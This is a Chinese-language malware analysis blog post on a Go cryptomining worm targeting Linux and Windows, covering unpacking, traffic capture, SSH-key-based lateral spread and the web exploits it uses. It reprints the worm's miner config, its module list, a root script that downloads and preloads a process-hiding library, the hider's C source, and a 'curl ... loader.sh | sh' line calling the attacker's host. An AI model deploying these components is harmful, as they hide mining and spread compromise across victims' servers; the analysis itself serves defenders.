参考链接:9f2K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3E0K9c8i4S2D9d9U0j5J5e0q4k6b7e0$3I4#2k6X3E0#2M7X3S2n7K9Y4M7`.
上周末看到了深信服千里目的病毒分析报告,顿时眼睛一亮,这种集合了Windows&&Linux&&Web流量攻击的恶意程序既考察了分析人员的知识广度,又给目前安全形势带来了严峻的考验。同时也让我觉得其实二进制与web之间的关系又近了一步。全栈并不是那么遥不可及!



upx脱壳后,发现go样本,找到main函数,定位到网络连接

域名+请求文件全都明文存储在文件中

放样本跑起来,查看输出(该程序大概功能会检查恶意程序的相关模块,根据系统信息下载对应缺失模块)

请求文件,可以看到病毒作者很人性化,还为我们专门定制了双平台的攻击模块017K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2Q4x3X3g2%4K9h3&6V1L8%4N6K6N6i4m8V1j5i4c8W2M7%4g2H3M7r3!0J5N6q4)9J5k6h3!0J5k6#2)9J5c8X3c8Q4x3V1k6%4K9h3&6V1L8%4N6K6N6i4m8V1j5i4c8W2N6U0q4Q4x3X3g2B7M7$3!0F1
我们以main函数中的网络请求之前下断,由此入手调试

地址下断b *0x6681ef,查看后续行为

不错!崩溃了(舰长,很有精神!),每次调试gdb都会崩溃。不浪费时间,换一种调试思路。(补充:下回试试 ltrace和strace)
tcpdump抓包,通过分析流量把该程序后续行为补全,导出http对象

好家伙都给老子下全了,剩下的我们逐个分析

(嚯,好家伙,ubuntu上给我下个pe,nbnb!!你是不是还得给我装个wine?)
二话不多说,火绒剑&&procmon,对症下药

(哟!这程序莫不是被我吓坏了?在我淫威之下屈服了?那老子就看看,不进去)
拖入ida,提示我们缺失dll库(问号脸?_?)

找到动态调用该模块的地方


根据以往经验,大概率挖矿程序都是魔改或梭哈的github开源项目,执行使用strings把字符串全dump出来,找到如下配置文件
再从github上搜一搜,终于让我找到了宁的前身
1aeK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6^5L8i4u0A6k6#2)9J5c8Y4S2E0M7X3W2Y4
作者为了防止被认出,还专门把相关指纹替换了一遍(不错,真tm用心良苦)


实际上,xmmrig.com这个域名根本不存在!
该程序会帮宁安装挖矿所缺失的一切组件,真tm替客户着想!!!
dbus程序前身为github上xmrig挖矿的开源项目
下载processhider.c模块,编译并替换掉/usr/local/lib/libc2.28.so,并添加到/etc/ld.so.preload中,由此再运行的程序都会优先加载preload中的模块
将上述进程 kworkers | dbus | autoupdate 过滤掉,从而达到隐藏进程的目的

(好家伙,上来就先把同行们和挖矿进程都干掉。。。果然搞tm病毒也内卷,赶快收集一波,以后应急先把这脚本跑一遍)

查询出口ip,查询本地ssh私钥和pem证书文件,最后通过查询knownhost查看连接过的主机

最后通过收集到的私钥连接其他机器使其下载loader.sh进行蠕虫式传播,自此也成就闭环
具备横传能力,危险系数高
(声明,本人对web洞及java研究不深,如有错误,欢迎探讨)
首先upx脱壳,好家伙,又一个go程序,查看导出表(找到了大宝藏)


这些main类中的扫描模块,我们一个一个看(当然,攻击模块还有很多,我就不献丑了)
xxljob (弱密码登后台?)
这个无法确定是哪个洞,一开始我以为是XXL-JOB executor未授权。。但始终没找到相关json串


mongo-express远程代码执行漏洞(CVE-2019-10758)
相关链接:6b5K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3X3g2G2M7X3N6Q4x3V1k6Q4x3U0y4Q4x3V1k6W2L8Y4k6A6M7X3!0F1L8h3g2F1N6s2y4Q4x3V1k6E0L8$3&6Y4L8#2)9J5k6r3g2^5M7s2u0W2M7%4y4Q4x3V1k6o6g2V1g2Q4x3X3b7J5x3o6p5&6i4K6u0V1x3e0l9%4y4e0S2Q4x3V1j5`.
shiro反序列化(cve-2016-4437)
相关链接:665K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3X3g2G2M7X3N6Q4x3V1k6Q4x3U0y4Q4x3V1k6W2L8Y4k6A6M7X3!0F1L8h3g2F1N6s2y4Q4x3V1k6K6K9r3W2J5L8#2)9J5c8V1y4h3c8g2)9J5k6o6t1H3x3e0k6Q4x3X3b7@1y4o6x3%4i4K6u0r3
tomcat密码爆破
(这个以前玩过,哈哈哈)

seeyon(致远OA远程代码执行漏洞)
相关链接:96cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7Y4S2F1i4K6u0W2L8X3g2@1i4K6u0r3L8X3g2%4M7#2)9J5c8U0j5J5x3q4)9J5k6h3S2@1L8h3H3`.
seeyon(致远OA任意文件上传)
相关链接:a61K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2U0L8X3u0D9L8$3N6K6i4K6u0W2j5$3!0E0i4K6u0r3M7$3E0W2N6r3y4Z5M7r3H3@1L8X3g2Q4x3V1k6H3i4K6u0r3x3e0b7#2x3e0f1I4x3e0y4Q4x3X3g2Z5N6r3#2D9
泛微oa(远程代码执行)
相关链接:110K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3y4o6p5%4y4e0M7J5z5o6m8Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0p5H3x3e0p5&6z5o6R3@1y4b7`.`.
用友oa(远程命令执行)
相关链接:4ccK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8X3@1H3i4K6g2X3y4e0R3@1x3K6b7$3x3K6c8Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0p5I4y4K6f1@1y4K6p5$3y4l9`.`.
docker daemon api 未授权访问
相关链接:
324K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3X3g2G2M7X3N6Q4x3V1k6Q4x3U0y4Q4x3V1k6W2L8Y4k6A6M7X3!0F1L8h3g2F1N6s2y4Q4x3V1k6V1L8$3y4C8k6i4u0Q4x3V1k6#2L8X3q4#2N6r3S2G2M7X3W2*7k6h3c8Q4x3X3c8J5j5$3g2Q4x3V1j5`.


structs2(包括S008\S013\S015\S016\S045\S046\S057)


jenkin插件远程代码执行(不确定)


weblogic console接口远程代码执行漏洞
fastjson 1.2.47远程命令执行
找到main.DownLoadFile函数,交叉引用
下载dubbo.jar模块

下载dubbo.jar对应的攻击参数


可以看到dubbo.jar配置文件中执行的命令为
curl httlp://m.windowsupdatesupport.org/d/loader.sh | sh横向传播,即通过已知的web漏洞进行横向传播

反编译该程序发现包括快速检测和exp(攻击模块)

执行的参数如上
至此,病毒就分析到这里了,这个样本覆盖的知识面相当全面,拿来练手再合适不过。最近两年针对企业端服务器的各种木马越来越多,二进制与web之间的鸿沟也越来越近,希望各位安全员们以此为戒,全面发展才是未来的出路
参考链接:b8eK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3E0K9c8i4S2D9d9U0j5J5e0q4k6b7e0$3I4#2k6X3E0#2M7X3S2n7K9Y4M7`.
#题外话
最近在找工作,希望以此抛砖引玉,找到份自己心怡的工作,工作地点(北京、天津)感谢!!
web新手,文章若分析有误欢迎共同探讨
{
"linux"
: [{
"filename"
:
"download"
,
"handle"
:
"download"
,
"url"
:
"/download"
,
"ver"
:
"20210002"
},{
"filename"
:
"dbus"
,
"handle"
:
"downrun"
,
"url"
:
"/dbus"
,
"ver"
:
"20210002"
},{
"filename"
:
"hideproc.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/hideproc.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"sshkey.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/sshkey.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"autoupdate"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate"
,
"ver"
:
"20210012"
},{
"filename"
:
"kworkers"
,
"handle"
:
"update"
,
"url"
:
"/kworkers"
,
"ver"
:
"20210008"
}
],
"windows"
: [{
"filename"
:
"service.exe"
,
"handle"
:
"update"
,
"url"
:
"/service.exe"
,
"ver"
:
"20210008"
},{
"filename"
:
"inj.exe"
,
"handle"
:
"download"
,
"url"
:
"/inj.exe"
,
"ver"
:
"20210003"
},{
"filename"
:
"runtime.dll"
,
"handle"
:
"download"
,
"url"
:
"/runtime.dll"
,
"ver"
:
"20210003"
},{
"filename"
:
"autoupdate.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate.exe"
,
"ver"
:
"20210012"
},{
"filename"
:
"updater.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/updater.exe"
,
"ver"
:
"20210003"
}]
}
{
"linux"
: [{
"filename"
:
"download"
,
"handle"
:
"download"
,
"url"
:
"/download"
,
"ver"
:
"20210002"
},{
"filename"
:
"dbus"
,
"handle"
:
"downrun"
,
"url"
:
"/dbus"
,
"ver"
:
"20210002"
},{
"filename"
:
"hideproc.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/hideproc.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"sshkey.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/sshkey.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"autoupdate"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate"
,
"ver"
:
"20210012"
},{
"filename"
:
"kworkers"
,
"handle"
:
"update"
,
"url"
:
"/kworkers"
,
"ver"
:
"20210008"
}
],
"windows"
: [{
"filename"
:
"service.exe"
,
"handle"
:
"update"
,
"url"
:
"/service.exe"
,
"ver"
:
"20210008"
},{
"filename"
:
"inj.exe"
,
"handle"
:
"download"
,
"url"
:
"/inj.exe"
,
"ver"
:
"20210003"
},{
"filename"
:
"runtime.dll"
,
"handle"
:
"download"
,
"url"
:
"/runtime.dll"
,
"ver"
:
"20210003"
},{
"filename"
:
"autoupdate.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate.exe"
,
"ver"
:
"20210012"
},{
"filename"
:
"updater.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/updater.exe"
,
"ver"
:
"20210003"
}]
}
"api"
: {
"id"
: null,
"worker-id"
: null
},
"http"
: {
"enabled"
: true,
"host"
:
"127.0.0.1"
,
"port"
:
61254
,
"access-token"
: null,
"restricted"
: true
},
"autosave"
: true,
"background"
: true,
"colors"
: true,
"title"
: true,
"randomx"
: {
"init"
:
-
1
,
"init-avx2"
:
-
1
,
"mode"
:
"auto"
,
"1gb-pages"
: false,
"rdmsr"
: true,
"wrmsr"
: true,
"cache_qos"
: false,
"numa"
: true,
"scratchpad_prefetch_mode"
:
1
},
"cpu"
: {
"enabled"
: true,
"cpu-affinity"
:
3
,
"threads"
:
3
,
"huge-pages"
: true,
"huge-pages-jit"
: false,
"hw-aes"
: null,
"priority"
: null,
"memory-pool"
: false,
"yield"
: true,
"max-threads-hint"
:
50
,
"asm"
: true,
"argon2-impl"
: null,
"astrobwt-max-size"
:
550
,
"astrobwt-avx2"
: false,
"cn/0"
: false,
"cn-lite/0"
: false
},
"opencl"
: {
"enabled"
: false,
"cache"
: true,
"loader"
: null,
"platform"
:
"AMD"
,
"adl"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"cuda"
: {
"enabled"
: false,
"loader"
: null,
"nvml"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"donate-level"
:
0
,
"donate-over-proxy"
:
0
,
"log-file"
: null,
"pools"
: [
{
"algo"
: null,
"coin"
: null,
"url"
:
"m.windowsupdatesupport.org:443"
,
"user"
:
"x"
,
"pass"
:
"x"
,
"rig-id"
: null,
"nicehash"
: true,
"keepalive"
: false,
"enabled"
: true,
"tls"
: true,
"tls-fingerprint"
: null,
"daemon"
: false,
"socks5"
: null,
"self-select"
: null,
"submit-to-origin"
: false
}
],
"print-time"
:
60
,
"health-print-time"
:
60
,
"dmi"
: true,
"retries"
:
5
,
"retry-pause"
:
5
,
"syslog"
: false,
"tls"
: {
"enabled"
: true,
"protocols"
: null,
"cert"
: null,
"cert_key"
: null,
"ciphers"
: null,
"ciphersuites"
: null,
"dhparam"
: null
},
"user-agent"
: null,
"verbose"
:
0
,
"watch"
: true,
"pause-on-battery"
: false,
"pause-on-active"
: false
"api"
: {
"id"
: null,
"worker-id"
: null
},
"http"
: {
"enabled"
: true,
"host"
:
"127.0.0.1"
,
"port"
:
61254
,
"access-token"
: null,
"restricted"
: true
},
"autosave"
: true,
"background"
: true,
"colors"
: true,
"title"
: true,
"randomx"
: {
"init"
:
-
1
,
"init-avx2"
:
-
1
,
"mode"
:
"auto"
,
"1gb-pages"
: false,
"rdmsr"
: true,
"wrmsr"
: true,
"cache_qos"
: false,
"numa"
: true,
"scratchpad_prefetch_mode"
:
1
},
"cpu"
: {
"enabled"
: true,
"cpu-affinity"
:
3
,
"threads"
:
3
,
"huge-pages"
: true,
"huge-pages-jit"
: false,
"hw-aes"
: null,
"priority"
: null,
"memory-pool"
: false,
"yield"
: true,
"max-threads-hint"
:
50
,
"asm"
: true,
"argon2-impl"
: null,
"astrobwt-max-size"
:
550
,
"astrobwt-avx2"
: false,
"cn/0"
: false,
"cn-lite/0"
: false
},
"opencl"
: {
"enabled"
: false,
"cache"
: true,
"loader"
: null,
"platform"
:
"AMD"
,
"adl"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"cuda"
: {
"enabled"
: false,
"loader"
: null,
"nvml"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"donate-level"
:
0
,
"donate-over-proxy"
:
0
,
"log-file"
: null,
"pools"
: [
{
"algo"
: null,
"coin"
: null,
"url"
:
"m.windowsupdatesupport.org:443"
,
"user"
:
"x"
,
"pass"
:
"x"
,
"rig-id"
: null,
"nicehash"
: true,
"keepalive"
: false,
"enabled"
: true,
"tls"
: true,
"tls-fingerprint"
: null,
"daemon"
: false,
"socks5"
: null,
"self-select"
: null,
"submit-to-origin"
: false
}
],
"print-time"
:
60
,
"health-print-time"
:
60
,
"dmi"
: true,
"retries"
:
5
,
"retry-pause"
:
5
,
"syslog"
: false,
"tls"
: {
"enabled"
: true,
"protocols"
: null,
"cert"
: null,
"cert_key"
: null,
"ciphers"
: null,
"ciphersuites"
: null,
"dhparam"
: null
},
"user-agent"
: null,
"verbose"
:
0
,
"watch"
: true,
"pause-on-battery"
: false,
"pause-on-active"
: false
if
[
"$EUID"
-
ne
0
]
then echo
"Please run as root"
else
if
[ `grep libc2.
28
/
etc
/
ld.so.preload` ]
then echo
"hideproc already done!!"
else
apt
-
get update
-
y
apt
-
get install build
-
essential
-
y
yum check
-
update
yum install build
-
essential
-
y
dnf groupinstall
"Development Tools"
-
y
yum group install
"Development Tools"
-
y
curl http:
/
/
m.windowsupdatesupport.org
/
d
/
processhider.c
-
o processhider.c
gcc
-
Wall
-
fPIC
-
shared
-
o libc2.
28.so
processhider.c
-
ldl
mv libc2.
28.so
/
usr
/
local
/
lib
/
-
f
grep libc2.
28
/
etc
/
ld.so.preload || echo
/
usr
/
local
/
lib
/
libc2.
28.so
>>
/
etc
/
ld.so.preload
rm
-
f processhider.c
ls >
/
tmp
/
.
1
2
>&
1
grep libc2.
28.so
/
tmp
/
.
1
&& echo >
/
etc
/
ld.so.preload
fi
fi
if
[
"$EUID"
-
ne
0
]
then echo
"Please run as root"
else
if
[ `grep libc2.
28
/
etc
/
ld.so.preload` ]
then echo
"hideproc already done!!"
else
apt
-
get update
-
y
apt
-
get install build
-
essential
-
y
yum check
-
update
yum install build
-
essential
-
y
dnf groupinstall
"Development Tools"
-
y
yum group install
"Development Tools"
-
y
curl http:
/
/
m.windowsupdatesupport.org
/
d
/
processhider.c
-
o processhider.c
gcc
-
Wall
-
fPIC
-
shared
-
o libc2.
28.so
processhider.c
-
ldl
mv libc2.
28.so
/
usr
/
local
/
lib
/
-
f
grep libc2.
28
/
etc
/
ld.so.preload || echo
/
usr
/
local
/
lib
/
libc2.
28.so
>>
/
etc
/
ld.so.preload
rm
-
f processhider.c
ls >
/
tmp
/
.
1
2
>&
1
grep libc2.
28.so
/
tmp
/
.
1
&& echo >
/
etc
/
ld.so.preload
fi
fi
/
*
*
Every process with this name will be excluded
*
/
static const char
*
process_to_filter
=
"kworkers|dbus|autoupdate"
;
/
*
*
Get a directory name given a
DIR
*
handle
*
/
static
int
get_dir_name(
DIR
*
dirp, char
*
buf, size_t size)
{
int
fd
=
dirfd(dirp);
if
(fd
=
=
-
1
) {
return
0
;
}
char tmp[
64
];
snprintf(tmp, sizeof(tmp),
"/proc/self/fd/%d"
, fd);
ssize_t ret
=
readlink(tmp, buf, size);
if
(ret
=
=
-
1
) {
return
0
;
}
buf[ret]
=
0
;
return
1
;
}
/
*
*
Get a process name given its pid
*
/
static
int
get_process_name(char
*
pid, char
*
buf)
{
if
(strspn(pid,
"0123456789"
) !
=
strlen(pid)) {
return
0
;
}
char tmp[
256
];
snprintf(tmp, sizeof(tmp),
"/proc/%s/stat"
, pid);
FILE
*
f
=
fopen(tmp,
"r"
);
if
(f
=
=
NULL) {
return
0
;
}
if
(fgets(tmp, sizeof(tmp), f)
=
=
NULL) {
fclose(f);
return
0
;
}
fclose(f);
int
unused;
sscanf(tmp,
"%d (%[^)]s"
, &unused, buf);
return
1
;
}
static struct dirent
*
(
*
original_
\
struct dirent
*
readdir(
DIR
*
dirp) \
{ \
if
(original_
original_
if
(original_
{ \
fprintf(stderr,
"Error in dlsym: %s\n"
, dlerror()); \
} \
} \
\
struct dirent
*
dir
; \
\
while
(
1
) \
{ \
dir
=
original_
if
(
dir
) { \
char dir_name[
256
]; \
char process_name[
256
]; \
if
(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
strcmp(dir_name,
"/proc"
)
=
=
0
&& \
get_process_name(
dir
-
>d_name, process_name) && \
strstr( process_to_filter,process_name)) { \
continue
; \
} \
} \
break
; \
} \
return
dir
; \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
/
*
*
Every process with this name will be excluded
*
/
[招生]系统0day安全-IOT设备漏洞挖掘(第6期)!